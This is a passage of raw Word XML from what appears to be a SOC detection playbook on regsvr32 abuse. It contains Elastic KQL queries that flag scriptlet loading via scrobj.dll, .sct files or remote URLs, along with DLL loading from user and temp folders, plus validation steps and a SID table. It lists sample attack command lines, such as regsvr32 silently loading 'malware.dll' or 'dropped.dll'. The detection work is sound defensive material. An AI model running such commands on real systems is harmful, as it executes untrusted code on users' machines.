            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> regsvr32.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65684F54" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t>AND (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DB84359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*/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50FC9482" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t xml:space="preserve">  OR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*-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04DA1DB7" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EB2AAD4" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t>AND (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67506D71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*scrobj.dll*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13836D82" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t xml:space="preserve">  OR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*http*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="340CC575" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t xml:space="preserve">  OR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*\\\\*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68FFD9F1" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t xml:space="preserve">  OR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*ftp*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A58D47C" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t xml:space="preserve">  OR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*.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sct</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CDC5C08" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64352F86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 xml:space="preserve">Query Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00F01C92">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://portal.cybersoc.my/app/r/s/ZyF3d</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="676D240F" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610D415E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2.1.2 Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54919EE5" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3C16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Compare with baseline: </w:t>
      </w:r>
      <w:r>
        <w:t>regsvr32 rarely used legitimately by regular users, most executions are suspicious.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3402"/>
        <w:gridCol w:w="4252"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C13D48" w14:paraId="63F2CB88" w14:textId="77777777" w:rsidTr="001E792E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A64DF8F" w14:textId="77777777" w:rsidR="00C13D48" w:rsidRDefault="00C13D48" w:rsidP="001E792E">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AE16529" w14:textId="77777777" w:rsidR="00C13D48" w:rsidRDefault="00C13D48" w:rsidP="001E792E">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13D48" w14:paraId="2F4E996E" w14:textId="77777777" w:rsidTr="001E792E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74770123" w14:textId="77777777" w:rsidR="00C13D48" w:rsidRDefault="00C13D48" w:rsidP="001E792E">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t>S-1-5-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="147388AA" w14:textId="77777777" w:rsidR="00C13D48" w:rsidRDefault="00C13D48" w:rsidP="001E792E">
            <w:r>
              <w:t>SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13D48" w14:paraId="30729134" w14:textId="77777777" w:rsidTr="001E792E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7560E939" w14:textId="77777777" w:rsidR="00C13D48" w:rsidRDefault="00C13D48" w:rsidP="001E792E">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t>S-1-5-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21E02EDD" w14:textId="77777777" w:rsidR="00C13D48" w:rsidRDefault="00C13D48" w:rsidP="001E792E">
            <w:r>
              <w:t>LOCAL SERVICE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13D48" w14:paraId="6BC2B3F4" w14:textId="77777777" w:rsidTr="001E792E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36394538" w14:textId="77777777" w:rsidR="00C13D48" w:rsidRDefault="00C13D48" w:rsidP="001E792E">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t>S-1-5-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E213A34" w14:textId="77777777" w:rsidR="00C13D48" w:rsidRDefault="00C13D48" w:rsidP="001E792E">
            <w:r>
              <w:t>NETWORK SERVICE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13D48" w14:paraId="75D92D9E" w14:textId="77777777" w:rsidTr="001E792E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="277E9A64" w14:textId="77777777" w:rsidR="00C13D48" w:rsidRDefault="00C13D48" w:rsidP="001E792E">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t>S-1-5-21-...-500</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EF5C6D2" w14:textId="77777777" w:rsidR="00C13D48" w:rsidRDefault="00C13D48" w:rsidP="001E792E">
            <w:r>
              <w:t>Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C13D48" w14:paraId="1619C209" w14:textId="77777777" w:rsidTr="001E792E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27B8039B" w14:textId="77777777" w:rsidR="00C13D48" w:rsidRDefault="00C13D48" w:rsidP="001E792E">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t>S-1-5-21-...-1001+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="596F18DD" w14:textId="77777777" w:rsidR="00C13D48" w:rsidRDefault="00C13D48" w:rsidP="001E792E">
            <w:r>
              <w:t>Normal user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="023EE8EE" w14:textId="77777777" w:rsidR="00C13D48" w:rsidRDefault="00C13D48" w:rsidP="00C13D48">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C9ADD0" w14:textId="0CD27E2B" w:rsidR="003C4AA9" w:rsidRPr="00C13D48" w:rsidRDefault="003C4AA9" w:rsidP="00C13D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C13D48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Check</w:t>
      </w:r>
      <w:r w:rsidRPr="00807F22">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00826329" w:rsidRPr="00C13D48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>parent process</w:t>
      </w:r>
      <w:r w:rsidR="00BA6779" w:rsidRPr="00C13D48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/process lineage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718998AC" w14:textId="0315ED2E" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008469F0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Confirm with endpoint owner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Validate whether </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003559F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scriptlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> loading was intentional (almost never legit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F08500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2.1.3 True positive indicator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BFBDF1" w14:textId="44AF574E" w:rsidR="00D108BE" w:rsidRPr="005B51D8" w:rsidRDefault="00BA5778" w:rsidP="005B51D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Normal u</w:t>
      </w:r>
      <w:r w:rsidR="0071548A" w:rsidRPr="00D108BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ser-initiated execution </w:t>
      </w:r>
      <w:r w:rsidR="0071548A" w:rsidRPr="00EB79F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(user.name or user.id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A869BB4" w14:textId="27626AF8" w:rsidR="00507119" w:rsidRDefault="0071548A" w:rsidP="00CC044E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507119">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">No associated </w:t>
      </w:r>
      <w:r w:rsidR="007273EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">legit </w:t>
      </w:r>
      <w:r w:rsidRPr="00507119">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">installer </w:t>
      </w:r>
      <w:r w:rsidR="00CF68B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">or legit </w:t>
      </w:r>
      <w:r w:rsidR="00E67004">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>parent</w:t>
      </w:r>
      <w:r w:rsidR="00984919">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A20B01C" w14:textId="7C39541B" w:rsidR="0093121E" w:rsidRDefault="0093121E" w:rsidP="00507119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0093121E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msiexec.ex</w:t>
      </w:r>
      <w:r w:rsidR="00D51D1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACFE841" w14:textId="185F41B3" w:rsidR="00507119" w:rsidRPr="00507119" w:rsidRDefault="00507119" w:rsidP="00507119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507119">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>install.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEC51B6" w14:textId="35650824" w:rsidR="00507119" w:rsidRPr="00507119" w:rsidRDefault="00507119" w:rsidP="00507119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507119">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>installer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A00EC4" w14:textId="14858A9B" w:rsidR="00507119" w:rsidRPr="00507119" w:rsidRDefault="00507119" w:rsidP="00507119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507119">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>update.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5510C0" w14:textId="2A16C77C" w:rsidR="00507119" w:rsidRPr="00507119" w:rsidRDefault="00507119" w:rsidP="00507119">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507119">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>patch.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7467C1DD" w14:textId="13396F6D" w:rsidR="0071548A" w:rsidRDefault="00507119" w:rsidP="0039611E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00507119">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uninstall.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170AF366" w14:textId="56EAA01D" w:rsidR="0039611E" w:rsidRPr="0039611E" w:rsidRDefault="0039611E" w:rsidP="0039611E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8541C8" w14:textId="554ADB6A" w:rsidR="0071548A" w:rsidRPr="00CF68B8" w:rsidRDefault="0071548A" w:rsidP="00CF68B8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF68B8">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Detect Regsvr32 loading DLL from non-system path </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5239714B" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:left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00BC29B5" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="000536E8" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000536E8">
        <w:t>regsvr32.exe /s C:\Users\Admin\Desktop\payload.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D98C7F7" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="000536E8" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000536E8">
        <w:t>regsvr32.exe /s C:\ProgramData\malware.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793C25F2" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="000536E8" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000536E8">
        <w:t>regsvr32.exe /s C:\Windows\Temp\test.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1388AAB4" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="000536E8" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000536E8">
        <w:t>regsvr32.exe /s C:\Users\Victim\Downloads\invoice.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D09838B" w14:textId="77777777" w:rsidR="0071548A" w:rsidRPr="000536E8" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000536E8">
        <w:t>regsvr32.exe /s %TEMP%\dropped.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710868A0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2.2.1 Query KQL Elastic XDR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363"/>
      </w:tblGrid>
      <w:tr w:rsidR="0071548A" w14:paraId="6F8071FE" w14:textId="77777777" w:rsidTr="006B3FC4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8363" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AA2A926" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t xml:space="preserve">(process.name: regsvr32.exe) AND </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D400DB6" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t xml:space="preserve">     (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>process.command</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_line</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>: *C</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>\:\\Users\\</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">* OR </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D5B0970" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>process.command</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_line</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>: *C</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>\:\\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ProgramData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>\\</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">* OR </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4885CD27" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>process.command</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_line</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>: *C</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>\:\\Windows\\Temp\\</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">* OR </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="501C253D" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>process.command</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_line</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>: *\\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>AppData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">\\Local\\Temp\\* OR </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62CD675B" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>process.command</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_line</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>: *C</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>\:\\Users\\Public\\</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">* OR </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D02F1DC" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>process.command</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_line</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">: *\\Downloads\\* OR </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75058306" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="006B3FC4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>process.command</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_line</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>: *\\Desktop\\*)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DA1FE02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Query</w:t>
      </w:r>
      <w:r w:rsidRPr="00B84D7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00F01C92">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://portal.cybersoc.my/app/r/s/ZREPK</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A9A5962" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
